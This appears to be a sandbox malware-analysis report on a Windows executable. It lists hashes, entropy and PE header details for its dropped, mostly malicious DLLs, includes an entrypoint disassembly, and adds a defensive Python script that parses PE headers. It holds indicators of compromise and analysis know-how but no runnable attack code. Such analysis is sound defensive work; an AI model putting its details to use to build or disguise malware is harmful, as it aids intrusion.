SHA-512: ECA792CC814C0D072ECB866DA4A5AC41629758C91FAAC4CF3F5947191899919C72A1462CE97BC49382AFEF44780302F7AC3FB2052CFE0CDC8D2A3F390A870C66
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
Reputation: low
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 224032
Entropy (8bit): 6.519383044005073
Encrypted: false
SSDEEP: 3072:gFgYgUFb6RWyLGttBrz7UVCoAsoRrXaZqb/Lh9VEyIXveGtGgCUF:CgzU5lyWcCoKr9/LhrEyIXveGtGcF
MD5: BBC454DFBD919CE1524E75478582C04D
SHA1: 4A331B6DC29C28A0D4FBEF90225448B88FD2A6FD
SHA-256: EAA9EFDE1704FA6ABBEF9878EECFA386E89003F23E07ADCAF641A6C741893BA1
SHA-512: 0A41EDB08378C6930BB6D6D6E951D550129DCB07886CFC636E28903C32B8DFE49124CFFC852BC9F93058D3679C4F775D70E9F869760F82A5AF54D9DCB303A013
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: verification.b-cdn.net.ps1, Detection: malicious
Reputation: low
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 1223168
Entropy (8bit): 6.184837665736595
Encrypted: false
SSDEEP: 12288:c2SL/WMO8k65sFAkOLCjpN/BYP2jJHs9T/+WWUOOnDPgXz3On6LXfu0ztGtdBBEE:ch7dk65IDBFO9T/dnDPV51X
MD5: C5C4D6351AF07ABBAECE1A4AA03C21FC
SHA1: 0C08FF968AA41A5CC5AC5C70BC98448D8A7D9B2E
SHA-256: 3054976F132DDA71B964B9303757078BFB75E94F19A2D2100180B86A8263384C
SHA-512: 6283DDB41619CCA6CE6389896B045307FEB3051C9E0065FC0F68C02E9E88007E4B8E967AFBB873CBC02682ECA76988AEBA5DEFC9CD696EA58DAA3984B1BA0238
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 685224
Entropy (8bit): 5.879596760181968
Encrypted: false
SSDEEP: 12288:BfWBgRdNVSnkjiLSRHhWsfl4GhW0TAZoq:BfWBgRdNUnkHWsfl4Gg0ED
MD5: 8499BCB782E639B57ABB8B503D410EB8
SHA1: A4E3363A30C02FE999EEDFED50A8DD200F4C46C9
SHA-256: 84B47308ABC293515FA8B682D7EDE3A53FED426A7073CFEC466BCDE681DA715F
SHA-512: 344132B5148CE38174230EFB51B0AAA85709BBE2F34C09FF47E9390324EE1139423717CC461E7F276DB80FCB86A0509CA92CD84A18B7657D3DA65C8FE427FC39
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
Reputation: low
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 682728
Entropy (8bit): 5.557949920752852
Encrypted: false
SSDEEP: 6144:HzhEDInt1CqI2HVP5CkxQ+1QYCQkdJvdkjiLSRen4QI2QjWsfl4GZrWJ6TPRcoLZ:H1EPCSnkjiLSRHhWsfl4GhW0T+eZ
MD5: 6D3C7D2E108CBB7B5389F51FF68BCB9A
SHA1: E47006DBD81B0AD005DFE95339BB54AC59B20F47
SHA-256: 53ED3512437FBEB4277C24790CE67DB048F81B60C3669765541495EF88056B88
SHA-512: 0B69C294C32BEFF25E91CCFC5FD3B26FF76E8A92B81B3F69FC0065AE6C8D8A676039303CC5195BFF1D71735A1AF97F920ED1A9911BCBCD27A7532F7539605FDF
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\HLZwUhcJ28.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1022005
Entropy (8bit): 7.935294887911351
Encrypted: false
SSDEEP: 24576:YbYJZPZf7KMuiA7Q4lsXBmStxacrFhG+wTGiPoy1u7MHltI:YAZfmM/A7Uk6xhpmGkoy1u7MH0
MD5: C50B50303FAE4AFE7248307339A00D13
SHA1: 1B4A3F7666172809BD0D88F793EE855BD4B92938
SHA-256: 712C39A069541AFA69CFCBE01B422BD67B4201EEE7E94CC1327D4ED8B4FA2167
SHA-512: 123D06A0A5F891851E372881860B9D7FB8C453DCDBBCA5970B9B2BF205F08F0A724595C6892F4AFBBB4F85292A886DDDFFBF0D36DFE18D4B6EEA7A5D12451762
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...p,ge..-........ ...).........`!..p0..p!.................................. 1...........@... ......................................0.......0.......0......0).....................................................................................................UPX0.....`!.............................UPX1.........p!.....................@....rsrc.........0.....................@...4.23.UPX!.$..."%h@.:..Z0.]...5.-.I+.}.[s.H.t$..|$....L....I......I).I9.r..H....H.*H.....&H.s..nR....H....(;N...$...^n....?...:....L...I....e.....v...:.h.......?.H%.....o.Q....~8..2.....@..m. H.<.H..:....n..3...~.....V...$.W........8A........:...n.D$(..L...+.Q$..x...E.g...8.f...?..:O..It/..T1.;f.?.x.@....<4.:D.L$8...^HU.PXO@0....M.t.A.@..N9.)}.\.......`E1.L.p...@Hh.$..>..oz..Q. R..v.y.x..^.L..xS .;pP.`.k....0.$.. .8..M.w...+....|L.t\...6..w..A..z*....t..... S...x...
                                                                                                                                                                        Process:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1118202
                                                                                                                                                                        Entropy (8bit):7.23134186093806
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:pqMOaBAUZLY3wPKo6VbbTiZGavkg3NyeuQ6l9fH+fXFJ:pD/BAUZLYgio6EZGaXBuQQ9eXFJ
                                                                                                                                                                        MD5:28C28885656C64FC5ED923CC97C77718
                                                                                                                                                                        SHA1:71F4B7E06010F8F4D975AD6E2C919B56801447F3
                                                                                                                                                                        SHA-256:967189ADFBC889FDE89AAFC867F7A1F02731F8592CF6FD5A4ACE1929213E2E13
                                                                                                                                                                        SHA-512:EAA8888FAA1C6E1A121061B4B110A49904E0553265EAF445E18C0BB283AD72774D25557A8E64648F69FB7822D6913924CB54BFE67A0DD2A8069701807F7BC488
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....e....8.....&"...*............0.....................................................`... ......................................0.......@..8....p......................................................@...(....................A...............................text...`...........................`..`.data........ ......................@....rdata..P....0......................@..@.pdata..............................@..@.xdata..............................@..@.bss......... ...........................edata.......0......................@..@.idata..8....@......................@....CRT....X....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):242965
                                                                                                                                                                        Entropy (8bit):6.116459167800282
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:iJ9OPigBoQtFsrSMM4Ma9NQo/SMGY0DsSxSmg109oQJuJf6PwZiPcsexTyBbD:IAZJtiGqNQoqlZQSxHg1KFYWktyBbD
                                                                                                                                                                        MD5:3F7F652DA15858368B346010B1655EBF
                                                                                                                                                                        SHA1:57BB9DF055AB11BA82BB9E5D9AA20CAC3AE4B242
                                                                                                                                                                        SHA-256:621F5BFC24CDAE8479A69B56DE530AB6CEE633352AE0BCE01885CC6B1ECA0371
                                                                                                                                                                        SHA-512:6C23B7F4899BFFECEA445AFD87ABAD98F19A5FC4E824E559ABBE0BA5CCDBA480555CE188AC966641B7718FD02B7705017E0E7FD161357066EAF9C06F6936D9BF
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...M..e....w.....&"...*............0........................................ ......S.....`... ............................................................................................................. x..(.......................p............................text...............................`..`.data...`...........................@....rdata..0p... ...r..................@..@.pdata...............r..............@..@.xdata...............~..............@..@.bss.....................................edata..............................@..@.idata..............................@....CRT....X...........................@....tls................................@....reloc..............................@..B........................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):188681
                                                                                                                                                                        Entropy (8bit):6.383613198945696
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:N0qJF6y6kvs/qVaN06ptuBJsbYOiR409srWXMYSbaFt+p/UzR83:NbF6Uvs/69qiG06K4baFtA/WR83
                                                                                                                                                                        MD5:E3F805C0B24A800C30A63E36E6153AD1
                                                                                                                                                                        SHA1:639F3F22B2A885335C8973D35B0923BE979B621F
                                                                                                                                                                        SHA-256:42A63CB4C3C28A683D9F6C3510DE5EC17849EB18C097FA02CD78AEB800BFF202
                                                                                                                                                                        SHA-512:7AA18D7160301D99F14BF9D53325D417199DA767B73586DCF366B740C1FF8411B98768EC1440D76C70E3DD2F103D7083FA0C211FD7B24ABEB06B30D67AD9EA72
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...*L.e....k.....&"...*............0.......... .............................P.......X....`... ......................................................0.......................@..l...........................`...(.......................(............................text...............................`..`.data...@....0......................@....rdata..Pg...@...h..................@..@.pdata..............................@..@.xdata..|...........................@..@.bss....`................................edata..............................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....rsrc........0......................@..@.reloc..l....@......................@..B................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        File Type:current ar archive
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2637314
                                                                                                                                                                        Entropy (8bit):5.351710573742669
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:fi3OqSECXKPkKDxEpvsd7sXdxHYw651Itb9ic+GZBke1m/hKSBXq+7mo+C8wWC1f:fiMECXrKDxEqdHIO8wbpcg
                                                                                                                                                                        MD5:998EAE6672A406B75BF6F00B932D6441
                                                                                                                                                                        SHA1:462D238E306474068E4ABFED0F7F952DC6098BB3
                                                                                                                                                                        SHA-256:5C23768BDA74BDF8B2775166D5AD9BBF603EF864DFF58F7B091B15420A2187C1
                                                                                                                                                                        SHA-512:AC70CCFD714C5575C36E05004A718C065B36E98054C4A7E5BF76EDEEA09A1D2E1272F3BCBB6B15C19D36165F1B06172FDE6F569A323F5278728F44C2759580F0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:!<arch>./ 0 0 0 0 1114338 `...D....&...........t.......\.......L.......F.......X.......V.......J.......6.......&...........................b.......>.......$...........n.......F.......$...................h.......@...................t.......V.......@.......0...................f.......D...... &.. ...!...!n..!..."H.."...#<..#...$...$...%...%...%...&t..&...'...(...(...(...)r..)...*`..*...+<..+...,0..,...-...-........p....../T../...0@..0...1"..1...2...2v..2...3n..3...4T..4...5>..5...6 ..6...7...7r..7...8^..8...9@..9...:"..:...;...;...;...<r..<...=b..=...>F..>...?$..?...@...@...@...Al..A...BR..B...C0..C...D...D...E...Ev..E...Fb..F...GJ..G...H...H...I...I|..I...JZ..J...KB..K...L*..L...M...Mz..M...Nb..N...ON..O...P2..P...Q"..Q...R...R...R...Sf..S...TN..T...UP..U...VB..V...W...W...X...X...Y...Y...Y...Zf..Z...[J..[...\...\...]...]...]...^h..^..._V.._...`F..`...a&..a...b...b...b...cj..c...d\..d...e<..e...f*..f...g...g...h...h~..h...ih..i...jH..j...k$..k...l.
                                                                                                                                                                        Process:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        File Type:current ar archive
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):711720
                                                                                                                                                                        Entropy (8bit):5.314764071074336
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:wLF1kUfJqfkCq2lJs1709WW53UfevMwBsFiJ4ZRKfwq3SLclVG5S6xeTbi+V9ykx:uXkUfJqfkCB+3DMD8n0
                                                                                                                                                                        MD5:773D20B0FAA71528D04FCF9BA6196A44
                                                                                                                                                                        SHA1:5B29CBCB56B873E630C0D5304836913E467F2D33
                                                                                                                                                                        SHA-256:0AF3025B2F13EA825E2EEA6E69EFC6EB68A78FC09387CA75E54083C0E6580CEB
                                                                                                                                                                        SHA-512:3EBBB60C36E5C07CA9C9D20CF74D85E7B1B3D59428328DBAECFE4AE4FF394284978050946848E393D766AAD7261EBABC47ED01767AEC3D91303FC18A9B9E2ADC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:!<arch>./ 0 0 0 0 346882 `.......KF..L...M...N...N...O(..O(..O...P...P...P...Q...Q...R~..R~..S...S...S...S...T...T...U...U...V>..V>..V...V...WJ..WJ..X...X...X...X...Y...Y...Y...Y...Z...Z...Z...Z...[...[...\...\...\|..\|..\...\...]l..]l..]...]...^X..^...^..._..._...`V..`V..a...a...b$..b$..b...b...c>..c>..c...c...dV..dV..d...d...en..en..e...e...f...f...g...g...g...g...h*..h*..h...h...iB..iB..i...i...jZ..jZ..j...j...kx..kx..k...k...l...l...mh..mh..n...n...n...n...o...o...pD..pD..q...q...q...q...rj..rj..sJ..sJ..t...t...t...t...t...t...u...u...v(..v(..v...v...w`..w`..w...w...x...x...y4..y4..y...y...zp..zp..{...{...{...{...|:..|:..|...|...}B..}B..}...}...~J..~J..~...~....T...T...........`...`...H...H...................f...f...................d...d...........p...p...........n...n...&...&..........................."..."...........................................L...L...2...2...........................................2...2...........*...*................
                                                                                                                                                                        Process:C:\Users\user\Desktop\HLZwUhcJ28.exe
                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1444360
                                                                                                                                                                        Entropy (8bit):6.596995002582352
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:xtBluVgsasJjDWXpobeA9QQ4XpuEgVDEPNJDTow+a9N61fxA:xtBlufas1D5eQaXLn+a9N6E
                                                                                                                                                                        MD5:51B250D1B96BDE5CCEC152C11667692B
                                                                                                                                                                        SHA1:C12D436BB7F9D5F4449633300994D8EBEB20F8B0
                                                                                                                                                                        SHA-256:F6B6F1161F924F997C186C78D6CAB6EC0DE0D06EA7B56E4876D02FBE8B4DCB32
                                                                                                                                                                        SHA-512:4FD631053DEAC5C436A343416AE869397CDEA0F124EB08B2C5099DB55DBD1C45E36B4BBFAEA4A2D986F186B80E357DD0AB9EAC5562A133BB3193B137771F092D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jo/...A...A...A..v...A..a@...A.Uf@...A..aD...A..aE...A..aB...A..~@...A...@.9.A..~E...A..~D...A..~A...A..~....A..~C...A.Rich..A.................PE..d...:.l`.........." ................x...............................................P...............................................P*..t....*..........@............p..............X!..T...................."..(....!..0............................................text...K........................... ..`.rdata..V`.......b..................@..@.data....V...p...L...N..............@....pdata..............................@..@.qtmetadf............^..............@..P.rsrc...@............`..............@..@.reloc...............d..............@..B........................................................................................................................................................................................
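The dropped-file records above list, per file, the MD5/SHA1/SHA-256/SHA-512 hashes, the 8-bit entropy, the libmagic file type (PE32+ DLL, console, x86-64; "current ar archive") and, for the main sample, the static PE header fields (Time Stamp, Entrypoint, Imagebase, Subsystem, Image File Characteristics, DLL Characteristics). The Python below is an added example, not Joe Sandbox code: it reproduces those fields from raw bytes so they can be cross-checked offline, which is worth doing here because every dropped DLL is flagged Malicious while ReversingLabs reports 0% detection, and one of them (entropy 7.93, UPX0/UPX1 sections, "UPX!" marker in the preview) is UPX-packed. The PE it parses in the usage block is a constructed header-only stub built from the report's values, not bytes of the real sample; the flag tables are the documented PE constants, and the section-name UPX check and "windows console" label are this example's own conventions.

```python
"""Reproduce sandbox-report static fields (hashes, entropy, file type, PE header
attributes) for dropped files.  Added example, not Joe Sandbox code."""
import hashlib
import math
import struct
from datetime import datetime, timezone

# Documented PE constants (IMAGE_DLLCHARACTERISTICS_*, IMAGE_FILE_*, IMAGE_SUBSYSTEM_*).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x2000: "DLL"}
SUBSYSTEMS = {2: "windows gui", 3: "windows console"}   # labels chosen for this example
MACHINES = {0x014C: "i386", 0x8664: "x86-64"}


def hashes(data: bytes) -> dict:
    """The MD5/SHA1/SHA-256/SHA-512 columns of a dropped-file record."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256", "sha512")}


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0-8.0); values near 8 suggest packing or encryption."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def file_kind(data: bytes) -> str:
    """Magic-based type; the report's 'current ar archive' starts with '!<arch>\\n'."""
    if data.startswith(b"!<arch>\n"):
        return "ar archive"
    if data.startswith(b"MZ"):
        return "PE (MZ)"
    return "unknown"


def flags(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> COFF file header -> optional header -> section table."""
    if not data.startswith(b"MZ"):
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    if magic == 0x20B:      # PE32+: 64-bit ImageBase at +24
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    elif magic == 0x10B:    # PE32: BaseOfData at +24, 32-bit ImageBase at +28
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = [data[o:o + 8].rstrip(b"\0").decode("latin-1")
                for o in range(opt + opt_size, opt + opt_size + 40 * nsect, 40)]
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "is_dll": bool(chars & 0x2000),
        "file_characteristics": flags(chars, FILE_CHARACTERISTICS),
        "timestamp": datetime.fromtimestamp(stamp, timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "image_base": image_base,
        "entrypoint": image_base + entry_rva,          # report's Entrypoint = Imagebase + RVA
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": flags(dll_chars, DLL_CHARACTERISTICS),
        "os_version": f"{os_major}.{os_minor}",
        "sections": sections,
        "upx_packed": any(s.startswith("UPX") for s in sections),  # UPX0/UPX1 section names
    }


def build_stub_pe64(stamp, entry_rva, image_base, dll_chars, section_names,
                    file_chars=0x0022, subsystem=2):
    """Constructed header-only PE32+ (no code, not loadable) used as offline test input."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), stamp, 0, 0, 240, file_chars)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                       # PE32+ magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<HH", opt, 40, 5, 2)                      # OS version 5.2
    struct.pack_into("<HH", opt, 68, subsystem, dll_chars)
    struct.pack_into("<I", opt, 108, 16)                        # NumberOfRvaAndSizes
    sects = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sects


if __name__ == "__main__":
    # Stub built from the report's static values: stamp 0x6640972B, entrypoint RVA 0x266b0,
    # image base 0x140000000, DllCharacteristics 0xC160 (HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|GUARD_CF|TSA).
    stub = build_stub_pe64(0x6640972B, 0x266B0, 0x140000000, 0xC160, [".text", ".rdata", ".data"])
    print(file_kind(stub), hashes(stub)["sha256"], round(entropy(stub), 3), parse_pe(stub))
```

Run it against the real dropped files (read the bytes, then call `hashes`, `entropy`, `file_kind` and `parse_pe`) and compare with the record above each file: matching hashes confirm you hold the same artifact, the entropy and section names separate the UPX-packed DLL from the plainly linked MinGW ones, and the timestamp decode should reproduce "Sun May 12 10:17:15 2024 UTC" for the main sample. The script relies only on the standard library; `struct.unpack_from` offsets follow the PE32/PE32+ optional-header layouts, so a 32-bit sample parses too.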
                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.989386971657968
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:HLZwUhcJ28.exe
                                                                                                                                                                        File size:13'706'949 bytes
                                                                                                                                                                        MD5:b736da6a81e01bebfdd469d26785e13c
                                                                                                                                                                        SHA1:e82d651e62747674fd6c8bfeb2ebdb569f572c9f
SHA256: 4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014
SHA512: 254bfdb89b477cea6f3edb5c1635b4bf5992a64abc1454627da26420a4dff26f61c7397ab8dfbfa002d4f53e0b07956f0319176bcc26d7eafa0e4ea6c31e0f69
SSDEEP: 393216:xa8RFy/nyLknMNJsywsseZIX2MURx3cor8:xBRFYnaBwvemGRvXr8
TLSH: 7BD6334B9ED400AAC429BCB595317431F5333C41D7509FAE13BEBA261AE3F586D6E20E
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,
Icon Hash: 070c1c3d5ccf4f38
Entrypoint: 0x1400266b0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x6640972B [Sun May 12 10:17:15 2024 UTC]
TLS Callbacks: (none listed; a TLS directory is present, see the data directory table)
CLR (.Net) Version: (none; native PE32+ image)
OS Version Major: 5
OS Version Minor: 2
File Version Major: 5
File Version Minor: 2
Subsystem Version Major: 5
Subsystem Version Minor: 2
Import Hash: e8a30656287fe831c9782204ed10cd68
Instruction (entrypoint code at 0x1400266b0, shown as x86-64)
Note: the report's original listing decoded these bytes as 32-bit code, so every REX prefix (0x40 to 0x4F) appeared as a spurious inc/dec of a 32-bit register and 64-bit operands were shown as 32-bit ones. The same bytes are listed below as the x86-64 instructions they encode (the image is PE32+ with base 0x140000000); call, jmp and je targets are kept exactly as the report printed them. The first stub is the ordinary MSVC CRT entry sequence (stack-cookie initialisation followed by a tail jump into the CRT startup routine), so the entrypoint itself is not a packer stub.
sub rsp, 28h
call 00007FD8F955B248h
add rsp, 28h
jmp 00007FD8F955ABDFh
int3
int3
mov rax, rsp
mov qword ptr [rax+08h], rbx
mov qword ptr [rax+10h], rbp
mov qword ptr [rax+18h], rsi
mov qword ptr [rax+20h], rdi
push r14
sub rsp, 20h
mov r10, qword ptr [r9+38h]
mov rsi, rdx
mov r14, r8
mov rbp, rcx
mov rdx, r9
mov rcx, rsi
mov rdi, r9
mov ebx, dword ptr [r10]
shl rbx, 04h
add rbx, r10
lea r8, qword ptr [rbx+04h]
call 00007FD8F955A1A3h
mov eax, dword ptr [rbp+04h]
and al, 66h
neg al
mov eax, 00000001h
sbb edx, edx
neg edx
add edx, eax
test dword ptr [rbx+04h], edx
je 00007FD8F955AD73h
mov r9, rdi
mov r8, r14
mov rdx, rsi
mov rcx, rbp
call 00007FD8F955CA33h
mov rbx, qword ptr [rsp+30h]
mov rbp, qword ptr [rsp+38h]
mov rsi, qword ptr [rsp+40h]
mov rdi, qword ptr [rsp+48h]
add rsp, 20h
pop r14
ret
int3
int3
int3
sub rsp, 48h
lea rcx, qword ptr [rsp+20h]
call 00007FD8F9559C73h
lea rdx, qword ptr [rip+00023B67h]
lea rcx, qword ptr [rsp+20h]
call 00007FD8F955BE42h
int3
jmp 00007FD8F9561C10h
int3
int3
int3
int3
int3
int3
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4b1e0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4b214 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0x1f964 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6c000 | 0x2ab4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x91000 | 0x938 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x460e0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x46180 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3de10 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4a4ac | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x398ce | 0x39a00 | 43edabbddfa6948cff2e968fd336a07d | False | 0.5457226138828634 | data | 6.465308419785883 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3b000 | 0x1118c | 0x11200 | 53297ea4f69cf70feab0538ecef732e2 | False | 0.44722285583941607 | data | 5.215657068009717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d000 | 0x1ef5c | 0x1a00 | 08eb45cbc6a0e70bd1c0a96a66c4a6d0 | False | 0.2765925480769231 | DOS executable (block device driver o\3050) [libmagic guess on section bytes] | 3.1766622656728773 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6c000 | 0x2ab4 | 0x2c00 | 703496d6ceba70b1fe234ccc9c454141 | False | 0.4807350852272727 | data | 5.409685184469512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6f000 | 0x308 | 0x400 | c445681068e68e0f8df59c5ea517c5e5 | False | 0.2421875 | data | 2.786346435110699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
